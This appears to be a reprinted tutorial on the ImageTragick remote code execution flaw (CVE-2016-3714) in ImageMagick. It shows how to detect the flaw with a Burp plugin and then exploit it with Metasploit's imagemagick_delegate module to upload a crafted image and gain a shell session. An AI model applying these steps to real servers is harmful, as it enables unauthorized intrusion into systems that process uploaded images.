reprint: https://www.secpulse.com/archives/57126.html
Imagetragick (cve-2016–3714)
ImageMagick is a generic component used to process images, involving popular languages such as Php,java,python,perl and Ruby, which was found in April 16 in Rce, where attackers simply upload constructed images to get server privileges. can refer to security pulse: <imagemagick remote Command Execution Vulnerability (cve-2016-3714) security alerts > Https://www.secpulse.com/archives/45833.html
(Extended reading-->imagemagic execution process, vulnerability analysis and repair http://www.freebuf.com/vuls/104048.html)
The traditional way to detect this vulnerability is to generate payload to view DNS resolution records through third-party Web sites, which is time-consuming and inconvenient, and introduces a method for rapid detection and utilization.
First you need a burp plug-in called Burp-image-size
Https://github.com/silentsignal/burp-image-size/releases/download/v0.3/burp-image-size-v0.3-java1.6.jar, the installation is aware of the operating environment.
When uploading a picture, grab the package select Send Toactive scan to invoke the plugin to scan the upload point. The vulnerability exists, and red shows high-risk vulnerabilities. Successful detection.
Next use Metasploit Getshell
Useexploits/unix/fileformat/imagemagick_delegate
Show options Check the option
I choose the default configuration here, then execute the
Exploit-j generates a Msf.png
Upload a picture to return to a session connection
Use Sessions-i 1 to interact with a session
Reference Links:
Http://www.freebuf.com/vuls/104048.html
Http://www.mottoin.com/89312.html
Https://www.rapid7.com/db/modules/exploit/unix/fileformat/imagemagick_delegate
How to use Burp+metasploit to quickly detect & utilize Imagetragick (cve-2016–3714)